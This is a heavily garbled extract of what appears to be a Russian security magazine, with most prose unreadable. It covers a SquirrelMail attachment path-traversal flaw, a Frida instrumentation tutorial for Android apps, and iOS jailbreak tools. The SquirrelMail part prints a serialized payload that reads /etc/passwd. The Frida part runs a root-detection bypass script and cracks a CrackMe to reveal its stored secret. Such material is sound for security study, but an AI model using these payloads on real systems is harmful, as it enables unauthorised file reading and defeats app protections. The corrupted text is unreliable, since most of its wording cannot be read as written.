?????�?� ????�????,� ?� ???� ???�?� ?� ????�?????�??� ???�?.� ???� ??????� ????�
?????�?� ???�????:� ????� ???�???� ????�???� att_local_name,� ??� ???� ???????�
????�?��????�??�??�?�??�?,�???�?�?�???�??�??�??�??�?�??�??�??
?????�????��???�???.
/class/deliver/Deliver.class.php
338:             } elseif ($message->att_local_name) {
339:                 global $username, $attachment_dir;
340:                 $hashed_attachment_dir = getHashedDir($username, $attachment_dir);
341:                 $filename = $message->att_local_name;
342:                 $file = fopen ($hashed_attachment_dir . '/' . $filename, 'rb');
343:
344:                 while ($tmp = fread($file, 570)) {
...
356:                 fclose($file);
357:             }
??�??�?,�?????�????� att_local_name,�?�????�?????�???�???�?�??�?
??????�??�??�?��??�???,�??�?????�??�??�??.
??�??�????� ???�??� ?� ??????�??� ????�????� ?� ???�??� /etc/passwd
?�????�??�???�?.
...s:14:"att_local_name";s:24:"../../../../../etc/passwd";}}
??�????�??�??�??�?�?????�?�???�?�燬quirrelMail
??�??�?????�?� ????� ????????�?� ???�????� ????�?� ???� ????�?� ??????�???
???� ??� ?????�??� ?????,� ???�?� ???�?????� ????.� ???�????�?� ???�?� ???????
????�?牜?????�???粻?????�?��??�??燬ent,�??�??�??�?�????�?????�?????
?????.�????�??????�??�??��??�?????�??�?????�????��??????�???�?
Download.
???�??�??�?????�??�??�??�燬quirrelMail
????????????�?????????�(?????)
??????
???,�???�??�???�?�???�??�??�????�?�????�??�?�???�???�?�?????�???�
????�?�??�???�??�??�??�??.��??�??�???�???�???�???�??�??�??�???�
?????� ?????�?� ???�????�????� SquirrelMail.� ?????� ???�?????�?,� ???� ???�??
?� ???�????� ???�?????�??� ???�??� ?� ???�???,� ????� ??� ???�?� ???�???� ?????�
?????� ?????.� ?� ???� ??� ????�??,� ???� ????,� ???????� ?????�??� ????� ?????�??
???,�??�??��??�??�??�??�?��??�??�??�??�???�??�??�????�?�???????�
???.
?????
???????�?????
????????燯nixoid�燤obile
zobnin@glc.ru
????????
???�???????
????????�??
?�????�?????????
?�??????燜RIDA
???�?�?�??????��???�?��?????�????�????�??�????�
???,� ??� ????� ???�?� ???�?????�???� ??????�??????� ??????�
??????�?,� ?????�??�??�?� ?� ???????�?.� ??� ????� ???�??�???,
???????�?????�?�????�????�??�?.�??燜rida,�??�??,�???�
????�???� ????�???�?� ?� ???�???� ?� ??????�???� ???� ???�?
??�??�?燡avaScript.
???????�??????????
????�????,� ???� ????� ?� ????� ?????� ?????� ???�???.� ??� ?????�????� ???� ?� ????�
????�?� ?� ????�??�?� ???�??�???�?????� ??????�??.� ??� ???�???�???,� ???
?� ???�???�?� ??� ??????�?� ???�??� ??� ???,� ???� ??� ?????�??� ??????�???,
?� ???????� ?????�?????�??� ????????�?� ??� ???�???�?:� ???�???� ???�?� ?????�
??????,�??�??????�?��??�???�???�??�?.
??� ??� ????� ??????�????�?� ?� ?????�?� ????�??� ?????�???� ???�???
???�????�????�(????�???????�?�??�??????�???�??��??????�????�?� an?
droid:debuggable="true"� ?� AndroidManifest.xml),� ???�?� ????�?????,
???� ????�?� ???�???� ???�???�??� ???�??�?� ??� ???�????.� ?� ???�?� ????�???:
???� ???�?� ????�?????,� ???� ??????�?� ???� ???????�??,� ?� ????�?� ????�?
???� ?????�?.� ???�?????� ???:� ???�????�??� ???�??� ????� ?� ???????� ??????�
??????�?� ?� ?????�??�??�?,� ????�?� ?� ?????� ????????� ???�?,� ???�???�???
???????� ???????�?� ?� ???�???�???� ???�?,� ???�?� ????�?� ????� ??� ???�???
????�?��??��????�???.
?� ??????� ????�????,� ???� ?� ????� ????� ???�??�???,� ???�???�???� ???�?
??�??�?�?????�??�???�??�????�???�??�??�??�??�?,�???�?�?????�??
???�????�??� ???�???� ??� JavaScript.� ???????� ?????�??�???�??� ???�?????
smali,� ???????� ???�??� ???�?????�?????� ????,� ???????� ?????�????� ???�????�
????� ??� ????�?� ???�??�????�?� ?� ??????�??�?� ???�???�??,� ????????� ????�
???�??�???��?????�???�??�?�???.�????�?,�?�??�??
FRIDA
Frida��??�??�?????�???燚inamic營nstrumentation燭oolkit,�?�???�????�???�
???�??�??,� ???�???�???� ??� ????� ????�???� ????�???�??� ???� ?� ???�??� ????�
????�??.�??�??�??�??�???燜rida��??�??�???�??燙ydia燬ubstrate�??爄OS
?� Xposed� Framework� ???� Android,� ??� ?????� ????�???�?,� ???�???�?� ???????
?????�???�??�?.燜rida�???�???�?�?�??�??,�??�?????�?�?�??�???�???�?
????� ?� ??????� ?????�???� ???�???.� ????�?� ?� ????� JavaScript� ????�?� Objec?
tive?C� ???� Java,� ?� ??????�???� ????�??????�?� ???�???�???� �??�?粻 ?� ????�
??????� ???�???�??.� ??� ????�?� ???�??�????�?� ?� ???�??�?� ?� ????�??� ???
??????�??,� ??????�??� ????�??�?????� JS????�???� (??� ???� ????�??� ?????�?
??�??�????�????�??????�???�????�?).
Frida�??�?�???????��??�???�????,�??????�???�??�???�??????�??
??,� ????�??� Windows,� Linux,� macOS,� iOS� ?� ????� QNX.� ??� ??� ?????� ???????�
??????�?�??�?????�????�??�???�??�??燗ndroid.
????,�??�???�??�?:
1.�?�???�??�??????�???燣inux.�??�?�燱indows,�?,�??�?�?????�??�?
???�?????�??�???�??�??燗ndroid,�??�?�?????�?????燣inux.
2.�?�????�?????� adb.� ?� Ubuntu/Debian/Mint� ????�??�???�???� ?????�??
sudo apt-get install adb.
3.�?�????�??�???�???�??�??�????�?�???燗ndroid�2��???.燜rida�???�
??�???????��?�?????�??�??,�?�??�??�?�???�??�??�?�?????�????�
????燗PK�??????�???�??�???�??.�??�???�?�?????�?.
???�?????�???�????燜rida:
$ sudo pip install frida
??�??� ???�???� ???�??� Frida,� ???????� ????�?????� ????�?????� ??� ????�???.
???�??� ???�?� ???�?� ??� GitHub,� ???� ???�??� ???�??� ???�?� ???�?????� ?� ????�
????� Frida,� ???????� ??� ????�???�?� ??� ????.� ??� ??????� ??????�??� ??????
???�???�.6.55.�??�???�?:
$ cd ~/Downloads
$ wget https://github.com/frida/frida/releases/download/10.6.55/frida-server-10.6.55-android-arm.xz
$ unxz frida-server-10.6.55-android-arm.xz
???�??�???� ????�???� ?� ???�?,� ????�???� ???????� ??� USB� (???�???�?� ?
???�??�????�????��??????�?燯SB)��?????�???�??�??�?�???�???:
$ adb push frida-server-10.6.55-android-arm /data/local/tmp/frida-server
??�???� ???????� ??� ????�???� ?� ???????� adb� shell,� ???�????�?� ???�??
???�?�?�??�??��????�???�??:
$ adb shell
> su
> cd /data/local/tmp
> chmod 755 frida-server
> ./frida-server
??????�???
??,� Frida� ????�??�???� ??� ????,� ???�??� ???????� ??� ????�??�?� (??� ???�????
???�????��??????�??�??�????).�?????�???�??�?????,�??�?�?????�?
???�???.�??�??�?�??�???�???�?�????�??爁rida?ps:
$ frida-ps -U
??�??�?�??�??�????�?�??�??�??�?,�??????�??�?�???�??�?�(????� ?U
????�???� USB,� ???� ????� Frida� ???????� ???�??� ???�??�??� ??� ??????�??
??????).� ????� ??� ??????� ????� ???�??,� ???�??,� ???� ??????� ?� ???�?� ?????�
??????��????�???�??�??�????.
???� ??????� ???�???�?� ?????�???� ????�????�?� ???�?????� ???????.� Frida
???�???�?� ?????�???� ????�????� ?� ?????� ?????�??� ???�??�?,� ?� ???� ???�?
???�?????�?????�???燣inux.�??�??�???�???�??�??�?????�????� open(
),�??????�?????�???�?�??�????�??�??�??�?�??�??�/???�?????.�?????�
???�???�????�?�????�???:
$ frida-trace -i "open" -U org.telegram.messenger
????�?�??????��??�???�??????�????????�????�???.�?�????�??�??
????????�?�???�????�??�??�?�??�????�?�????�????:
open(pathname="/data/user/0/org.telegram.messenger/shared_prefs/userconfing.xml", flags=0x241)
???� ????�?� ????�???,� ???� ?????�??� ??????� ????� userconfig.xml� ????�?
??????�?� shared_prefs� ?� ???�?� ???�??�??� ??????�?.� ???????� shared_prefs
?燗ndroid�?????�???�?�??�??�????�??�??�?,�????�?�??�????�???????�?,
???� ????� userconfig.xml� ?????�??� ???�???�?� ???�???�??.� ???� ????�
??????:
open(pathname="/storage/emulated/0/Android/data/org.telegram.messenger/cache/223023676_121163.jpg", flags=0x0)
?????�??�??�??�?.�????�??�???????�?�?????�?�??�????�??�??�??,
?????�?�??�???�??????�??�????�?�???�?�?�???.
open(pathname="/data/user/0/org.telegram.messenger/shared_prefs/stats.xml", flags=0x241)
???�???�???��?????�?� shared_prefs.�???�?�??�?,�???????�??�??�???
??????�??????.
open(pathname="/dev/ashmem", flags=0x2)
???�????�????�?,�?�??�??�?�????�???�??�???�?.�???� /dev/ashmem
???�????�??,�?�?????�???�?�??�???�?�??�???�??�?�??�??�???��???�
?????��??????營PC????????�?燘inder.�??�?�?????,�??�???�?�???�???,
???�????�??�???�??�?�燗ndroid,�??�?�????�???�???????�??�?????�???�
????�??�???????�??????�??.�????�???�?�??�?�??�?�??�??�???.
?????�??
??� ?????� ?????�???????� ????�????� ?� ?????� ???�??� ???�?????� ???????,
???�????� connect(),� ???????� ??????�???�?� ???� ???�??�????� ?� ???�??�??
???�??:
$ frida-trace -i "connect" -U com.yandex.browser
??�????��??�??�??�??�????�?�??�?�??????�??�??:
2028 ms  connect(sockfd=0x90, addr=0x94e86374, addrlen=0x6e)
2034 ms  connect(sockfd=0x90, addr=0x94e86374, addrlen=0x6e)
???�???��??,�??�??�??�???�???�??�????�?�?????燾onnect()��??�???�
??????� ??� ?????�???� sockaddr.� Frida� ??� ???�?� ??� ???�???� ?� ?????�?� ???????
?????�???�??�?????,��??????�??�??�?�??�????�???.�?!�?�????�????�
????�??,�??????�????�???燜rida�??�????�???�??�????�?�?????�??�???�
????.��??�??�??,�??�?�????�??�??�???爏ockaddr�???!
???�?�?�????�??�????�?� frida?trace,�?�????�???�??????�??�??�?
?????�???�?:
connect: Auto-generated handler at "/home/j1m/__handlers__/libc.so/connect.js"
???�???�???�??�?�??�???�????�??�??�???,�??????燜rida�????�???,�???�
??� ???????�??� ???�???�??� ????�???�?� ?� ???�??�??� ???�???.� ????�?� ??
??????�??�??� ??� ?????� ???� ????�??????�??�??� ?????,� ???????� ??� ???�???.
??�???�????�??�??�????�??:
onEnter: function (log, args, state) {
  log("connect(" +
      "sockfd=" + args[0] +
      ", addr=" + args[1] +
      ", addrlen=" + args[2] +
  ")");
},
???�?,� ???� ???� ????�?� ???????� ???�??� ????�???� ???� ????.� ??� ??� ???�?,� ???
???�??�???�???�??�????�?�?????� connect()��??�??�?????�?�????�???
sockaddr,�?�???�???�?�????��?????.�???�????�???爏ockaddr�??�?�???�
??????�??:
struct sockaddr {
  unsigned short    sa_family;    // address family, AF_xxx
  char              sa_data[14];  // 14 bytes of protocol address
};
?��??�??��?????�?�???燗F_INET,�??????�??��??�?,�????:
struct sockaddr_in {
  short            sin_family;   // e.g. AF_INET, AF_INET6
  unsigned short   sin_port;     // e.g. htons(3490)
  struct in_addr   sin_addr;     // see struct in_addr, below
  char             sin_zero[8];  // zero this if you want to
};
struct in_addr {
  unsigned long s_addr;          // load with inet_pton()
};
??�???�??營P??????�??????�?��???�????�???�?�??�????�??�?�(short
sin_family�+爑nsigned爏hort爏in_port)��?????�?�???�(unsigned爈ong).�??�???�
???,� ???� ???� ???�?� ????????� ?� ???????�?� ????�?� 4,� ?????� ???�?????� 8� ????
??� ???????�???� ????�?� ?� ???�??�???� ??,� ???�?� ????????� ???�??�??� IP??????
?�??�???.�??�???�??,�??????�???�???�??�??�????:
onEnter: function (log, args, state) {
  var addr = args[1].add("4")
  var ip = Memory.readULong(addr)
  var ipString = [ip & 0xFF, ip >>> 8 & 0xFF, ip >>> 16 & 0xFF, ip >>> 24].join('.')
  log("connect(" +
      "sockfd=" + args[0] +
      ", addr=" + ipString +
      ", addrlen=" + args[2] +
  ")");
},
??�???�??�????,�??�?�??�??�????,�??????��??�?,�?�???�??�??????�
????� ???.� ???� ????�?????,� ???� ???� ???� ???�????�??� ???�??�???� ARM
??????�???� little?endian� ???????� ???�??.� ???�?� ????�?� ???�????� ??� ?????
Memory��????燼dd(),�??�??�?燗PI燜rida.
???�???�?�???��????�????�???爁rida?trace:
connect(sockfd=0xbb, addr=173.194.222.139, addrlen=0x10)
connect(sockfd=0xba, addr=74.125.205.94, addrlen=0x10)
??�??.�???�?,�???�???�????.�??�??�??�??�?�??�?�??�?????�?????
????燗F_UNIX,燗F_INET�燗F_INET6��??�?�????�??�???�?�??燗F_INET,�????�
??� ??� ?????� ????????� ???????�??�???� ????�?.� ??� ????� ??� ?????� ??????�?
???�???�??�??�?�?????燗F_UNIX��???????�??�??營P�(???�?????�?�?????�
??營Pv6??????�??�????營Pv4).�????�?????�????�???�?�????�??�?,�???�?
???�???�??�??��??�?�??�???�???.��???�??�??�??�??�????�1.118.
47.115.
??????????
??�??�?� ??,� ???�?????�?� Frida� ?????�?� ????,� ???� ?????�??� ????�????
?�????�??�??�??�?��??�?????�??????.�???�?�????�??�?�??�?????�
???�?� API� Frida,� ??� ???�??,� ???� ?� ???� ????� ???�??� Java.� ?� ???� ???????� ??
?????�????�???????�???�????��????燡ava????�????��??????,��???�
???,� ????�???� ????�????�?� ?????� ??????� ??????�??� ??????� ???�???�??
???燗ndroid�(?�??�??�?�??????�???�?燢otlin).
???�??��???�???��??�???�?�?????�??�???�??�????�??��??�????�
???� ????�??.� ???�??� ?????� ????� (?????� ??� ??????�???� enumerate.js)
?�?????��???�??�?????�???�?:
Java.perform(function() {
  Java.enumerateLoadedClasses({
      onMatch: function(className) {
          console.log(className);
      },
      onComplete: function() {}
  });
});
???�????�???�??�??.�??�???�?�?????�?�????� Java.perform(),�????�
??????,� ???� ??� ?????� ???�??�???�?� ?� ???�????�??� ??????� Java� (???
Dalvik/ART� ?� ???�??� Android).� ?????� ??� ??????�?� ?????� Java.enumerate?
LoadedClasses()� ?� ??????�?� ???� ???� ???�???:� onMatch()� ?????� ?????�??
???牜????�???�??粻????�?,� onComplete()� ?� ?� ?????� ???�?� (???� ???�?,� ???
????�??�??�?�????,��?�??????�?�??�??�??).
??�??�???:
$ frida -U -l enumerate.js org.telegram.messenger
?� ?????� ??� ????�?� ????�??,� ???????�?� ???�????�??� ???�??� ????�??,
??????�??� ??� ???� ?� ?????� ??????� ???�???�??,� ??� ?????�?????� ????�????�
???� ?� ????�??�???� ????�?� ????�???�?� Android� (Android� ???�???�?� ????
????�????��??�??�??�???��?????燾opy?on?write).
??�????�???�??�???�??�??�?�??�?�???�????.�??�???�???�??�??
??,� ???� ?� ?????� ??� ????� ????�??� ???�?� ????�???� ????� ???,� ?� ????� ????� ????�
???��?????�???�???�?????�?????�?????�?�???�???�??.�??�??�???
????�??�????�??:
Java.perform(function () {
  var Activity = Java.use("android.app.Activity");
  Activity.onResume.implementation = function () {
      console.log("onResume() got called!");
      this.onResume();
  };
});
???�???� ??� ??????�???� Java.use(),� ???�?� ????????� ???�???????�??
???� ??????� ?� ????�??� android.app.Activity.� ?????� ??� ??????�???�?� ???
?????爋nResume(),�??????��??�?�??�?????�??�????�(this.onResume).
??,� ???� ???�??� ?� ???�????�??� ???�???�??� ???� Android,� ???�??� ?????,� ???
?????燗ctivity�???�????�??�??�??�????牜????�??粻???�???�??.�?�??�?
???�??�??�??????,�???�?�??????�?????�???爋nResume().�?�????�???
???�??�??,�??????�?????�???�?�??�?�??�????�???�?,��??�?�??�???�
???�?�?�???.
??�?� ??� ???�?????� ???�??� ??????� ??� Frida,� ?????�???� ?????�??,� ?????
???�???� ??� ????,� ?????� ???�?� ?????�??,� ??� ????????,� ???� ???� ???�??� ????�
???�?��????�??��??�?????�????�???�???�?�???�????牜onResume()爂ot
called!�.
???�?�????�?�???�??�?�????�????�???????�??????�?�???�?:
Java.perform(function () {
  MainActivity.onClick.implementation = function (v) {
      console.log('onClick');
      this.onClick(v);
  }
});
?�??�??�??�?????�????�???燯RL,��??????�???�???�?�??�???�??:
Java.perform(function() {
  var httpclient = Java.use("com.squareup.okhttp.v_1_5_1.OkHttpClient");
  httpclient.open.overload("java.net.URL").implementation = function(url) {
      console.log("request url:");
      console.log(url.toString());
      return this.open(url);
  }
});
?� ???�??� ???�??� ??� ????�???�?� ?� ?????� ???????�??� ???�????�?� OkHttp
?� ??????�???�?� ??� ?????� okHttpClient.open().� ??????�??� ???�??� ????
????.
Frida CodeShare
?� Frida� ????� ???�????�??� ??????�????� ?????�??,� ?� ???????� ???�?� ???�?
?????�????�????,�??爁ridantiroot��??�???????�?????,�??�???�???�?????�
????�??�??�?�?爎oot,� Universal燗ndroid燬SL燩inning燘ypass��????燬SL燩in?
ning,� Alert� On� MainActivity� ?� ???�??� ????,� ???????� ?????�???� ???�????�??
?????�????�???燗ndroid�?燡avaScript.
??�??�?�???�????�??�??�?�????�???�??�???�???????�???�??�????�
???��??????�????�????�?:
$ frida --codeshare dzonerzy/fridantiroot -U -f com.example.vulnapp
??????燙RACKME
?�?????�????�??�???�?�???�???�?????�????�??.�?�???�????�???????�
??� ???�?� ???�?� ???�??�??� ???�??� CrackMe.� ????�??� ???�??� ?????�??�?.
???�??,� ???�??� ??� ????� ????�??????�??� ?� ???�??� ??????�????.� Crackme?
one.apk� ??????�???� ????� ?� ????� ???�??�??� ???????,� ?� ????� ??????� ?
????????�????�????�??�?�??�?.�??�?�??�?,�??�????�??�?�??�?�???�
?????�??�???�??�?�???�???�?????,�?��?�?�??�?�??�??????�??�??,
???�?�?????,�??�???????�燜rida.
????,�??�???�?��???�??�???�?�??�???�??:
$ wget https://www.dropbox.com/s/mrjnme2xiv45j4g/crackme-one.apk
$ adb install crackme-one.apk
???�???�???�?�?????�???�?�??�?????�??�?�???�???�?�????�??�???�
???�?.� ???�??�?,� ???�?� ????�???� ????� CrackMe,� ??� ???�??� ?????�?????
???????�??� ?� ??????� ??????� ???�?.� ??� ???� ???� ???�????� ??� ?????� ????
?????� ????�?.� ????�???�??� ???�???�??� ???� Android� ??????�???� ???� ??????
???�??� ????� ?????� java.io.OutputStream,� ????� ?????� java.io.Output?
StreamWriter.� ?� ???�???� ??� ???� ????� ?????� write(),� ???????� ?� ????�???
??�?????�??�?.�??�???�?????�???�??�?????�??�?�???�????�????
?�????�?�?�????�??�??�???�???,�??????�????�??�???�??�??�??�??,
????�???�?:
Java.perform(function () {
  var os = Java.use("java.io.OutputStreamWriter");
  os.write.overload('java.lang.String', 'int', 'int').implementation = function (string, off, len) {
      console.log(string)
      this.write(string, off, len);
  };
});
??�??�???:
$ frida -U -f com.reoky.crackme.challengeone -l outputstream_write.js --no-pause
??�??,�?�???�?�???�???�?�???�?
poorly-protected-secret
??�???�??�????�?:
1.�� ????� ???� ??� ??????�?????� ?????� overload(),� ???� ???� ?????� Output?
StreamWriter� ?????�???� ???�?� ???� ??????� write()� ?� ???�??� ???????� ?????�
???�??.
2.�?� ??????�?????� ?????� no璸ause,� ???????� ???�?,� ????� ??� ?????
?????�???� ?????�??� ?????� ???�???�??� ?� ???� ????� ??� ?????,� ???�?� Frida
????�???�?�??�???�??��????�?????.
3.�?� ?????� ????� ????�???� ????� Cra?kMe� ???�?� ????� ??,� ????�?� ?????�?
?� ???� ???�??�??� ???????� ?� ???�????� ????� (???� ???�????,� ???� ???� ?� ???
???????�??�???�???)�???�????�????�??????�??�???�??�(?????�????
?� ?????�??� ????).� ?????,� ????�?,� ????� ?????:� ????� ??� CrackMe� ???�??
????�?� ?� ?????�????�??� ????� ?� ???�????�????� ??� ????�?
?????� ???????,� ?????�??????� ????� ??� ???�????�?� (??,� ??� ????�??� ????
??� ???� ???,� ????� ??� ??� ??????� ??� ????� ???�??????� ?� ??� ???????� ??????
???�?????�?).
??�????�???�?�??�?�???���??????�????�?????�?
??????
Frida� ?� ?????� ???�??� ???�??�???,� ?� ???????� ??????�?� ???�?� ???�???
?�??????�??�??�???�???�???�????�?�??,�??�???�?.�?�??�??�??�???
??�??�???,�?�??�???�??�??燡avaScript,�?????�??�???�????�?????燗n?
droid� ?� ???�???�??� ???� ????.� ???� ???,� ????� ??� ???????� ??????????�?,� ????
????�???� ??????�???�???�?� ????�???�???�??�???� ???�??�??�???,� ????�
?????�?�?�???�?燜rida,�??�????燼ppmon.
?????
?????
?????????
???????????
???�???????營OS�,
???�??�?????
?�??�???????�????
?????�?????
????�?????
???????�?�????????
??????????????�???????
�????????�
aoleg@voicecallcentral.com
?�??�?�???�???�???�??�??????燝oogle燩roject燴ero�????�
???????� ???�??�?� ???� ???�????�?,� ???�???�??�???� ??� ????
???�???爄OS����?????�?�.1.2.�?�??????�?�???�???�
??� ???�????�???�??� ???�???????� ????�????�?.� ???�???�?
???????�???� ???�????� ??????�??� ????�?� ??????�???� ???
???�??� ?????�??�????� ???�????�?� (?� ???????�????�??
????�????�??)� ????�??� ????�?????�??� ?� ???� ???� ?????
????�????�?�??�???????�??�???�?�????�???�?.
???�??�????燝OOGLE?
?� ????�??�??� ????�????�????� ?� ???�?????� ????� ????� ?????�?� ?????�?.
??� ???�??� ???� ???�???� ??� ?� ???,� ???� ???�??� ???�??� ???�???�????� ???�??
??????� ???�??�?� ???????�?,� ?� ?� ???,� ?????� ????�?� ???�??� ???�????� ??� ????�
???�??�???�?.�????�??�????�?�??�?�????��????�??�????,��??�?�?
???????��???�??�?�??�???�????燗pple�??�???�????�?�??�????�???.
???�???�?????�???�?100�????�??�????�????,��??�?�????�??�????�?
???�????�?�??�??????�????�???�????.
?�??�?�??�?�???�???�?燝oogle��???�??�???燗pple.�?,燗pple�??�??
????????�???�?�?�??�???????�??�???�??�??爄Cloud�?�??�????燝oogle
(?????�??,爄Cloud��??�??????�???燗pple�??�??????�???????�??�????,
???�??�??????� Google,� Microsoft,� Amazon� ?� AT&T),� ?� ??,� Google� ?????�???
????� ????� ???� ??????�??� ???� ???????�???� iOS� ?� ??� ???� ??????� ??� ????�?
???�????� ???�???????� ???????�??� ??� ???�????�??,� ???�??�??� ?� ???????�
?????燝oogle燩roject燴ero.
???�?????� ???�??�??� ???�??????� (?� ???� ??� ???� ???�??�???�?)� ???�?
????�???�?� ???�????�??� ??????�????� Google� ?????� ?????.� ???�??????,
???�?????� tfp0� (???�???????� ??� task_for_pid(0)),� ???�?????� ?????�????�
????�???????�??????�??�??�???�????�??�???�??�?�???�??�???爄OS�,
??????�??�??�???爉acOS�爄OS�.0?11.1.2.
Google�???�???�?�??�????�?�燗pple,燗pple�????�???�??????�??爄OS
11.2,� ???????� ???�???� ???�??????.� ????�???�???� ???????�??� ?� ???
?�??????�???????�??�???�???�?????�?.
??�??� ???� ??� ???�???� Google� ???� ?????�??� ????�?????�?� ???� ????�???
????�?????�???,�??��???�??�???�???�????�????.�??�??�???�?????�?
???�?????,� ???� Google� ??????�???� ???�??� ???� ???�?� ???�??� ??� ??????� ?????�
?????,�??�??�?�???�????�???,�??�??�????�?�??�????�??��?燤icrosoft
???�????�?燝oogle燩roject燴ero�??�?????�?�??�?�???,�??燤icrosoft�????�
????�????�???�??�????.
??�???????�?� ???�???� ???� ???????� ?� ????�??�?� ????�??�??� ????�?????�
?????.�??,�?????�??�????�?�??�????�????�????�???�???�??�??�????�
?????�??,�???�?�?????�????�??????�??��???�?�??????�???�???????�
??????� Cydia� (???�?????� ?� ????� ????????� ?????).� ????� ???�??� (saurik)
?� ????????� ???�????�?� ?????�??�?� ???????�?� ???� ?� ????�???� ???�????
?????�???� ?????� ????�????�?� ??� ????�?� ??????�?� ????� (??????�?� ?� ????�
????????!),�??���??�????�????,�??�???�???燙ydia.
???� ??� ?????� ??????� ??� ???� ??� ????,� ??� ????�????�?� ????.� ?????� ????�
??????,� ???� ??� ????�??�?????� ?� ???� ???� ????�???�?� ???�?� ?????.� ??� ?????�
??��??�?????�?�??�??????�?��??�???�?�???�?.
??????????��??????????
??�??????�???�????�?�??�?�?�??�???�???�???�??�???,�??????�??�??
????�?????� ????�??�?� ????�????�?.� ???�?� ???,� ????� ??????� ???�??� ??� ???,
???�????,�???�??�??�?�????????�?????�???�?�????�??�?????�??�??
iOS��??�??�??�?????�??�??.
????,�??�??�?�??�?????�????�??,�??�?????�?�???�???�?????�????
????�?�??�??�??�??�????�???�????�??�??�??�?????爄Tunes.�???�
??????�?� ?????� ??????� ??� ?????�???� ?????:� ????� ????� ??� ??� ???,� ????
�?????� ????�???�,� ???????� ??????� ??� ??????� ???�????� ????� ???�??�?????
???�??�??���??�??�?��??�????�??�?????�?�???�?�??�??爇eychain,
???� ??� ???????� ??????�???,� ???� ?� ??� ???�??� iPhone� ???� iPad.� ?� ???� ????� ??
??????� ??� ????�?????,� ??� ???� ???�?� ?� ??????� ?????� ?????�?????
???�?????�???�??�???�??�?,��?????�???�???�??�??�?????�????�?????�
????� ?????� ?� ???�??� ???�??� ??� ???�???� ????�?� ??� ???� ??� ?????� ???????
???� ????�??,� ?� ??????�?� ???�????� ?????�???� ?????.� ????� ??????� ???�??
??� ???,� ??� ????�?� ???�???� ???�??�?????� ???????� ??� ??????� ????�????�?
?�??�?�???,�??��?�???�????�?.
?�??�??�?????�??�?燬HSH2�???,��?????�??,�?�???�??:燗pple�????�
??????� ???�???????� ???� ???�??�?,� ???� ???????� ???�????� ????�????�?.
?????�????��??�??爄Phone�??�,�??�?????�?�??�????�(?�?�??�??
???�?????�???)爄OS�.3.3.
?????????
???�????�???�????�?,�???�??�??�?�???�????�??�燝oogle燩roject燴ero
???�????�?,�???�??�???�???�????�????�??�???�?.�???�??,��??�?????�
???�???� ????�????�?� Yalu� ????�??�???�???� ???�?� ???� ??.� ????????� ?????
????�??.
1.�??�???�?� IPA?????� ????�????�?� (????�?� ?� ????)� ?� ???�???�??� Cydia
Impactor.
2.�??�??�???� iPhone� ?� ?????�??�?� ?� ????�??�???�?� ??????�???�??� ?????�
?????,� ???�???�??� ???�??� 玊rust� this� computer?粻 (????�?� ???�????:
???爄OS��?�???�??�?�??�???�???�???�?�?????�??�????�?�??????�
?????�??爄OS��?????�?�??�???�?).
3.�?�??�???燙ydia營mpactor��??????�???�?�?�???營PA?????�???�????�?.
4.燙ydia� Impactor� ???�????� Apple� ID� ?� ??????.� ???�??� Apple� ID� ?� ??????
??�????�???????�???�??�?????燗pple�(????�?,�??�????�??�?�??????�
??????�????,�???�?�??�??�?????�???�??).
5.營PA?????�????�??�????�(???�??????�??�???�?�??�?�???�???!)��???�
?????� ?� ??????�???.� ??� ????� ???� ??� ????� ???� ????� ???�?� ?????�???� ????,
????�??�?�????�??�???�???,�??�?�?????�??�??�????�??�???.
6.�??�?� ???�???�???� ???????�????� ???�????� ???�???,� ???????� ??� ????�
?????� IPA?????� ?� ??????� ???� ???�????� ??� ??????�???,� ???�?� ?� ???�???�?
Settings�燝eneral�燩ro?les�燩ro?les�&燚evice爉anagement�(????��???�
????� ????�??�??� ???�???� ????,� ??� �??�???�?� ?� ????????� ?� ???�???�
???牜???�???��??????�??�?????�????�).
??�???� ???�????:� ???� ????� ???�?� ???�???�???� ???????�??� ???�??� ????�
??????�?,� ????� ???�??�?� ???�?????� ??????�?� ???�?� ?� ????????� (???
???????��???�?????�????�????��??�????爌pq.apple.com).�??�????
???�???�?�??�???�????.
7.�???�?�??�?�??�?�?�??�???�??????�????�???�??�???�?????.�???
???�???�??�??????,�??????�????�???�??��?�???????�??�??��???�
?????�??�???�?????�???.
????�?????� ?????� ????????� ??� ???�???�???� ????�????�?.� ???????� (?� ????�
????????�?????)燙ydia,�??�??�??燙ydia燬ubstrate,�??�???????�???�????
????,� ?????� ??????� ??� ?????�?� ?????�????�??� ???�???�??� ?� ???� ???� ????
?????�??�???�??�???,��????��?�??�???�??�???��??�??�??�????.
??�??� ???� ????� ????�????�??� ?� ???� ????�????�??� ???�?� ??� ??????.
???�?�??�??�??????�????�?????�???�???�??�??�?�?????�????�???�???�
????�???�????�?�?�????�?????�???,��??��???�???��??�?????�???
???�???�?????�????�???,�??�???�??�????�??�?????�??�?????�?�?????�
?????.� ?????�????� ?� ???????� ???????�??�????�???� ????�???� ???� ???�?????�
?????� ???� ???�??????�???� ????�???� ?� ????�???�??�???� Apple� ID?� ????�??,
??????�?????� ?????� ????�???� ???� ???�???� ????�????�?� ?� ????� ???�????�?
???�????�??.
???????�??�?????營OS�?11.1.2
????,� ?????� ????�????�?� ??� ????�?� ???�??�??� ???�????�?� ????� ??� ???�??
???????� ??� ??????�?� ???�?,� ??� ?????�??� ??� ???� ?� ???�????� ???�???.� ???
???�?�???�???:
• h3lix (iOS 10.0–10.3.3, 32-bit);
• Meridian (iOS 10.0–10.3.3, 64-bit);
• g0blin (iOS 10.3.x, 64-bit, A7–A9 only);
• LiberIOS (iOS 11.0–11.1.2);
• Electra (iOS 11.0–11.1.2).
h3lix:爄OS��??�-???�?????�?????�??
h3lix� ?� ?????�??� ????�??�?????� ??????� ??????�??� ????�????�??.� ??� ????�
?????�???� ???� 32????�??� ??????�???,� ??????�???� ???� ???????�???� ????
???�??爄OS�.�???�??�??爄Phone��,��??�?�????�??爄Pad�爄Pod燭ouch.
???�????�???� ????�???� ?� ???�??� ????�????�?� Cydia,� ???� ???� ????�?????
?� ????�??�??� ?????�????�??� ???�???�??� ??� ???�???�?.� ???�??� ????�??
?�???�???�????�??�?�?�???�???�?,�????�?�????�??????�?????�??
???�????�????�?????�?????�??�?�???�??�???爄OS�.
Meridian:爄OS��??�-???�??�?????�??
????�?????� Meridian� ???????� ????�???� 64????�?????� ??????�???� (iPhone
5s�爄Phone燲,��??�?�???�???爄Pad�???�???�??�???�?????�??),�??????�
????�?�????�??�??爄OS.��????�??�?????�??�??�??�???�?????�???�
???�?�????�?????�?�??�?????,�??�??,�???�???�??????�?????�?�?爄OS
10.2.1�??�????�??�??,�??�?�?????�??燳alu�??燬aigon.燙ydia�???��???�
